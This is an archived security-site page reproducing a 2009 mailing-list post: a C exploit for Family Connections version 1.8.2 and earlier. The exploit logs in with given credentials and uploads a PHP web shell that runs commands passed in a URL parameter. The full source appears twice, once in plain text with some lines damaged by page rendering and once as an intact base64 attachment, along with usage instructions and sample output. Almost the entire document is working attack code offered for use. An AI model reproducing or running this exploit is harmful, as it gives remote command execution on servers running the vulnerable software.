AOH :: HP Unsorted F :: VA3059.HTM

Family Connections <= 1.8.2 - Remote Shell Upload Exploit



Family Connections <= 1.8.2 - Remote Shell Upload Exploit
Family Connections <= 1.8.2 - Remote Shell Upload Exploit



--001636c5a4357621fd0466a8d305
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

/*

	Family Connections <= 1.8.2 - Remote Shell Upload Exploit
	
	Author: Salvatore "drosophila" Fresta
	
Contact: drosophilaxxx@gmail.com 
	
	Date: 3 April 2009

	The following software will upload a simple php shell.
	To execute remote commands, you must open the file
	using a browser.
	
	gcc rsue.c -o rsue
	
	./rsue localhost /fcms/ user password

	[*] Connecting...
	[+] Connected
	[*] Send login...
	[+] Login Successful
	[+] Uploading...
	[+] Shell uploaded
	[+] Connection closed
	
	Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands] 

*/	

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int socket_connect(char *server, int port) {

	int fd;
	struct sockaddr_in sock;
	struct hostent *host;
	
	memset(&sock, 0, sizeof(sock));
	
	if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
	
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	
	if(!(host=gethostbyname(server))) return -1;
	
	sock.sin_addr = *((struct in_addr *)host->h_addr);
	
	if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
	
	return fd;

}

int socket_send(int socket, char *buffer, size_t size) {
	
	if(socket < 0) return -1;

	return write(socket, buffer, size) < 0 ? -1 : 0;
	
}

char *socket_receive(int socket, int tout) {

	fd_set input;
	int ret, byte;
	char *buffer, *tmp;
	struct timeval timeout;
	
	FD_ZERO(&input);
	FD_SET(socket, &input);
	
	if(tout > 0) {
			timeout.tv_sec  = tout;
			timeout.tv_usec = 0;
	}
	
	if(socket < 0) return NULL;
	
	if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
	
	while (1) {
	
		if(tout > 0)
			ret = select(socket + 1, &input, NULL, NULL, &timeout);
	else
			ret = select(socket + 1, &input, NULL, NULL, NULL);
	
	if (!ret) break;
	if (ret < 0) return NULL;
	
	if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;
	
	if ((byte=read(socket, tmp, 1024)) < 0) return NULL;
	
		if(!byte) break;
	
	if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen
(tmp)))) return NULL;
	
	strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
	
	}
	
	return buffer;

}

void usage(char *bn) {

	printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
			"Author: Salvatore \"drosophila\" Fresta\n\n"
			"usage: %s    \n"
			"example: %s localhost /fcms/ admin 123456\n\n", bn, bn);	

}

int main(int argc, char *argv[]) {
	
	int sd;
	char code[] = "--AaB03x\r\n"
					"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
					"Content-Type: text/plain\r\n"
					"\r\n"
					"\"; system($_GET['cmd']); echo \"
\"?>\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"desc\"\r\n" "\r\n" "description\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"submitadd\"\r\n" "\r\n" "Submit\r\n" "--AaB03x--\r\n", *buffer = NULL, *rec = NULL, *session = NULL; if(argc < 5) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) { perror("calloc"); return -1; } sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n" "Host: %s\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]); printf("\n[*] Connecting..."); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Connected" "\n[*] Send login..."); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Login Successful")) { printf("\n[-] Login Incorrect!\n\n"); free(buffer); close(sd); return -1; } session = strstr(rec, "PHPSESSID"); session = strtok(session, ";"); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Login Successful" "\n[+] Uploading..."); sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: %s\r\n" "Content-type: multipart/form-data, boundary=AaB03x\r\n" "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Uploaded Successfully")) { printf("\n[-] Upload failed!\n\n"); free(buffer); close(sd); return -1; } free(buffer); close(sd); printf("\n[+] Shell uploaded" "\n[+] Connection closed\n\n" "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]); return 0; } -- Salvatore "drosophila" Fresta CWNP444351 --001636c5a4357621fd0466a8d305 Content-Type: application/octet-stream; name="rsue.c" Content-Disposition: attachment; filename="rsue.c" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ft32rati0 LyoKCglGYW1pbHkgQ29ubmVjdGlvbnMgPD0gMS44LjIgLSBSZW1vdGUgU2hlbGwgVXBsb2FkIEV4 cGxvaXQKCQoJQXV0aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQoJCglDb250YWN0 OiBkcm9zb3BoaWxheHh4QGdtYWlsLmNvbQoJCglEYXRlOiAzIEFwcmlsIDIwMDkKCglUaGUgZm9s bG93aW5nIHNvZnR3YXJlIHdpbGwgdXBsb2FkIGEgc2ltcGxlIHBocCBzaGVsbC4KCVRvIGV4ZWN1 dGUgcmVtb3RlIGNvbW1hbmRzLCB5b3UgbXVzdCBvcGVuIHRoZSBmaWxlIAoJdXNpbmcgYSBicm93 c2VyLgoJCglnY2MgcnN1ZS5jIC1vIHJzdWUKCQoJLi9yc3VlIGxvY2FsaG9zdCAvZmNtcy8gdXNl ciBwYXNzd29yZAoKCVsqXSBDb25uZWN0aW5nLi4uCglbK10gQ29ubmVjdGVkCglbKl0gU2VuZCBs b2dpbi4uLgoJWytdIExvZ2luIFN1Y2Nlc3NmdWwKCVsrXSBVcGxvYWRpbmcuLi4KCVsrXSBTaGVs bCB1cGxvYWRlZAoJWytdIENvbm5lY3Rpb24gY2xvc2VkCgkKCU9wZW4geW91ciBicm93c2VyIGFu ZCBnbyB0byBodHRwOi8vbG9jYWxob3N0L2ZjbXMvZ2FsbGVyeS9kb2N1bWVudHMvc2hlbGwucGhw P2NtZD1bY29tbWFuZHNdCgoqLwkKCiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN0ZGxp Yi5oPgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8 c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8dW5pc3RkLmg+ CiNpbmNsdWRlIDxuZXRkYi5oPgoKaW50IHNvY2tldF9jb25uZWN0KGNoYXIgKnNlcnZlciwgaW50 IHBvcnQpIHsKCglpbnQgZmQ7CglzdHJ1Y3Qgc29ja2FkZHJfaW4gc29jazsKCXN0cnVjdCBob3N0 ZW50ICpob3N0OwoJCgltZW1zZXQoJnNvY2ssIDAsIHNpemVvZihzb2NrKSk7CgkKCWlmKChmZCA9 IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkpIDwgMCkgcmV0dXJuIC0xOwoJCglzb2Nr LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwoJc29jay5zaW5fcG9ydCA9IGh0b25zKHBvcnQpOwoJCglp ZighKGhvc3Q9Z2V0aG9zdGJ5bmFtZShzZXJ2ZXIpKSkgcmV0dXJuIC0xOwoJCglzb2NrLnNpbl9h ZGRyID0gKigoc3RydWN0IGluX2FkZHIgKilob3N0LT5oX2FkZHIpOwoJCglpZihjb25uZWN0KGZk LCAoc3RydWN0IHNvY2thZGRyICopICZzb2NrLCBzaXplb2Yoc29jaykpIDwgMCkgcmV0dXJuIC0x OwoJCglyZXR1cm4gZmQ7CiAgIAp9CgppbnQgc29ja2V0X3NlbmQoaW50IHNvY2tldCwgY2hhciAq YnVmZmVyLCBzaXplX3Qgc2l6ZSkgewoJCglpZihzb2NrZXQgPCAwKSByZXR1cm4gLTE7CgoJcmV0 dXJuIHdyaXRlKHNvY2tldCwgYnVmZmVyLCBzaXplKSA8IDAgPyAtMSA6IDA7CgkKfQoKY2hhciAq c29ja2V0X3JlY2VpdmUoaW50IHNvY2tldCwgaW50IHRvdXQpIHsKCglmZF9zZXQgaW5wdXQ7Cglp bnQgcmV0LCBieXRlOwoJY2hhciAqYnVmZmVyLCAqdG1wOwoJc3RydWN0IHRpbWV2YWwgdGltZW91 dDsKCQoJRkRfWkVSTygmaW5wdXQpOwoJRkRfU0VUKHNvY2tldCwgJmlucHV0KTsKCQoJaWYodG91 dCA+IDApIHsKCQkJdGltZW91dC50dl9zZWMgID0gdG91dDsKCQkJdGltZW91dC50dl91c2VjID0g MDsKCX0KCQoJaWYoc29ja2V0IDwgMCkgcmV0dXJuIE5VTEw7CgkKCWlmKCEoYnVmZmVyID0gKGNo YXIgKikgY2FsbG9jICgwLCBzaXplb2YgKGNoYXIpKSkpIHJldHVybiBOVUxMOwoJCgl3aGlsZSAo MSkgewoJCgkJaWYodG91dCA+IDApCgkJCXJldCA9IHNlbGVjdChzb2NrZXQgKyAxLCAmaW5wdXQs IE5VTEwsIE5VTEwsICZ0aW1lb3V0KTsKCWVsc2UKCQkJcmV0ID0gc2VsZWN0KHNvY2tldCArIDEs ICZpbnB1dCwgTlVMTCwgTlVMTCwgTlVMTCk7CgkKCWlmICghcmV0KSBicmVhazsKCWlmIChyZXQg PCAwKSByZXR1cm4gTlVMTDsKCQoJaWYoISh0bXAgPSAoY2hhciAqKSBjYWxsb2MgKDEwMjQsIHNp emVvZiAoY2hhcikpKSkgcmV0dXJuIE5VTEw7CgkKCWlmICgoYnl0ZT1yZWFkKHNvY2tldCwgdG1w LCAxMDI0KSkgPCAwKSByZXR1cm4gTlVMTDsKCQoJCWlmKCFieXRlKSBicmVhazsKCQoJaWYoIShi dWZmZXIgPSAoY2hhciAqKSByZWFsbG9jKGJ1ZmZlciwgc3RybGVuIChidWZmZXIpICsgc3RybGVu ICh0bXApKSkpIHJldHVybiBOVUxMOwoJCglzdHJuY2F0KGJ1ZmZlciwgdG1wLCBzdHJsZW4oYnVm ZmVyKStzdHJsZW4odG1wKSk7CgkKCX0KCQoJcmV0dXJuIGJ1ZmZlcjsKICAgCn0KCnZvaWQgdXNh Z2UoY2hhciAqYm4pIHsKCglwcmludGYoIlxuRmFtaWx5IENvbm5lY3Rpb25zIDw9IDEuOC4yIC0g UmVtb3RlIFNoZWxsIFVwbG9hZCBFeHBsb2l0XG4iCgkJCSJBdXRob3I6IFNhbHZhdG9yZSBcImRy b3NvcGhpbGFcIiBGcmVzdGFcblxuIgoJCQkidXNhZ2U6ICVzIDxzZXJ2ZXI+IDxwYXRoPiA8dXNl cm5hbWU+IDxwYXNzd29yZD5cbiIKCQkJImV4YW1wbGU6ICVzIGxvY2FsaG9zdCAvZmNtcy8gYWRt aW4gMTIzNDU2XG5cbiIsIGJuLCBibik7CQoKfQoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFy Z3ZbXSkgewoJCglpbnQgc2Q7CgljaGFyIGNvZGVbXSA9ICItLUFhQjAzeFxyXG4iCgkJCQkJIkNv bnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT1cImRvY1wiOyBmaWxlbmFtZT1cInNo ZWxsLnBocFwiXHJcbiIKCQkJCQkiQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluXHJcbiIKCQkJCQki XHJcbiIKCQkJCQkiPD9waHAgZWNobyBcIjxwcmU+XCI7IHN5c3RlbSgkX0dFVFsnY21kJ10pOyBl Y2hvIFwiPC9wcmU+XCI/PlxyXG4iCgkJCQkJIi0tQWFCMDN4XHJcbiIKCQkJCQkiQ29udGVudC1E aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPVwiZGVzY1wiXHJcbiIKCQkJCQkiXHJcbiIKCQkJ CQkiZGVzY3JpcHRpb25cclxuIgoJCQkJCSItLUFhQjAzeFxyXG4iCgkJCQkJIkNvbnRlbnQtRGlz cG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT1cInN1Ym1pdGFkZFwiXHJcbiIKCQkJCQkiXHJcbiIK CQkJCQkiU3VibWl0XHJcbiIKCQkJCQkiLS1BYUIwM3gtLVxyXG4iLAoJCSpidWZmZXIgPSBOVUxM LAoJCSpyZWMgPSBOVUxMLAoJCSpzZXNzaW9uID0gTlVMTDsKCQkKCWlmKGFyZ2MgPCA1KSB7CgkJ dXNhZ2UoYXJndlswXSk7CgkJcmV0dXJuIC0xOwoJfQoJCglpZighKGJ1ZmZlciA9IChjaGFyICop Y2FsbG9jKDIwMCtzdHJsZW4oY29kZSkrc3RybGVuKGFyZ3ZbMV0pK3N0cmxlbihhcmd2WzJdKStz dHJsZW4oYXJndlszXSkrc3RybGVuKGFyZ3ZbNF0pLCBzaXplb2YoY2hhcikpKSkgewoJCXBlcnJv cigiY2FsbG9jIik7CgkJcmV0dXJuIC0xOwoJfQoJCglzcHJpbnRmKGJ1ZmZlciwgIlBPU1QgJXNp bmRleC5waHAgSFRUUC8xLjFcclxuIgoJCQkJCSJIb3N0OiAlc1xyXG4iCgkJCQkJIkNvbnRlbnQt VHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIKCQkJCQkiQ29udGVu dC1MZW5ndGg6ICVkXHJcblxyXG51c2VyPSVzJnBhc3M9JXMmc3VibWl0PUxvZ2luIiwgYXJndlsy XSwgYXJndlsxXSwgKHN0cmxlbihhcmd2WzRdKStzdHJsZW4oYXJndlszXSkrMjQpLCBhcmd2WzNd LCBhcmd2WzRdKTsKCQoJCQkJCQoJcHJpbnRmKCJcblsqXSBDb25uZWN0aW5nLi4uIik7CgkKCWlm KChzZCA9IHNvY2tldF9jb25uZWN0KGFyZ3ZbMV0sIDgwKSkgPCAwKSB7CgkJcHJpbnRmKCJbLV0g Q29ubmVjdGlvbiBmYWlsZWQhXG5cbiIpOwoJCWZyZWUoYnVmZmVyKTsKCQlyZXR1cm4gLTE7Cgl9 CgkKCXByaW50ZigiXG5bK10gQ29ubmVjdGVkIgoJCQkiXG5bKl0gU2VuZCBsb2dpbi4uLiIpOwoJ CglpZihzb2NrZXRfc2VuZChzZCwgYnVmZmVyLCBzdHJsZW4oYnVmZmVyKSkgPCAwKSB7CgkJcHJp bnRmKCJbLV0gU2VuZGluZyBmYWlsZWQhXG5cbiIpOwoJCWZyZWUoYnVmZmVyKTsKCQljbG9zZShz ZCk7CgkJcmV0dXJuIC0xOwoJfQoJCglpZighKHJlYyA9IHNvY2tldF9yZWNlaXZlKHNkLCAwKSkp IHsKCQlwcmludGYoIlstXSBSZWNlaXZlIGZhaWxlZCFcblxuIik7CgkJZnJlZShidWZmZXIpOwoJ CWNsb3NlKHNkKTsKCQlyZXR1cm4gLTE7Cgl9CgkKCWlmKCFzdHJzdHIocmVjLCAiTG9naW4gU3Vj Y2Vzc2Z1bCIpKSB7CgkJcHJpbnRmKCJcblstXSBMb2dpbiBJbmNvcnJlY3QhXG5cbiIpOwoJCWZy ZWUoYnVmZmVyKTsKCQljbG9zZShzZCk7CgkJcmV0dXJuIC0xOwoJfQoJCglzZXNzaW9uID0gc3Ry c3RyKHJlYywgIlBIUFNFU1NJRCIpOwoJc2Vzc2lvbiA9IHN0cnRvayhzZXNzaW9uLCAiOyIpOwoJ CglpZigoc2QgPSBzb2NrZXRfY29ubmVjdChhcmd2WzFdLCA4MCkpIDwgMCkgewoJCXByaW50Zigi Wy1dIENvbm5lY3Rpb24gZmFpbGVkIVxuXG4iKTsKCQlmcmVlKGJ1ZmZlcik7CgkJcmV0dXJuIC0x OwoJfQoJCglwcmludGYoIlxuWytdIExvZ2luIFN1Y2Nlc3NmdWwiCgkJCSJcblsrXSBVcGxvYWRp bmcuLi4iKTsKCQoJc3ByaW50ZihidWZmZXIsICJQT1NUICVzZG9jdW1lbnRzLnBocCBIVFRQLzEu MVxyXG4iCgkJCQkJIkhvc3Q6ICVzXHJcbiIKCQkJCQkiQ29va2llOiAlc1xyXG4iCgkJCQkJIkNv bnRlbnQtdHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YSwgYm91bmRhcnk9QWFCMDN4XHJcbiIKCQkJ CQkiQ29udGVudC1MZW5ndGg6ICVkXHJcblxyXG4lcyIsIGFyZ3ZbMl0sIGFyZ3ZbMV0sIHNlc3Np b24sIHN0cmxlbihjb2RlKSwgY29kZSk7CgkKCWlmKHNvY2tldF9zZW5kKHNkLCBidWZmZXIsIHN0 cmxlbihidWZmZXIpKSA8IDApIHsKCQlwcmludGYoIlstXSBTZW5kaW5nIGZhaWxlZCFcblxuIik7 CgkJZnJlZShidWZmZXIpOwoJCWNsb3NlKHNkKTsKCQlyZXR1cm4gLTE7Cgl9CgkKCWlmKCEocmVj ID0gc29ja2V0X3JlY2VpdmUoc2QsIDApKSkgewoJCXByaW50ZigiWy1dIFJlY2VpdmUgZmFpbGVk IVxuXG4iKTsKCQlmcmVlKGJ1ZmZlcik7CgkJY2xvc2Uoc2QpOwoJCXJldHVybiAtMTsKCX0KCQoJ aWYoIXN0cnN0cihyZWMsICJVcGxvYWRlZCBTdWNjZXNzZnVsbHkiKSkgewoJCXByaW50ZigiXG5b LV0gVXBsb2FkIGZhaWxlZCFcblxuIik7CgkJZnJlZShidWZmZXIpOwoJCWNsb3NlKHNkKTsKCQly ZXR1cm4gLTE7Cgl9CgkKCWZyZWUoYnVmZmVyKTsKCWNsb3NlKHNkKTsKCQoJcHJpbnRmKCJcblsr XSBTaGVsbCB1cGxvYWRlZCIKCQkJIlxuWytdIENvbm5lY3Rpb24gY2xvc2VkXG5cbiIKCQkJIk9w ZW4geW91ciBicm93c2VyIGFuZCBnbyB0byBodHRwOi8vJXMlc2dhbGxlcnkvZG9jdW1lbnRzL3No ZWxsLnBocD9jbWQ9W2NvbW1hbmRzXVxuXG4iLCBhcmd2WzFdLCBhcmd2WzJdKTsKCQoJcmV0dXJu IDA7CgkKfQoJ --001636c5a4357621fd0466a8d305--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.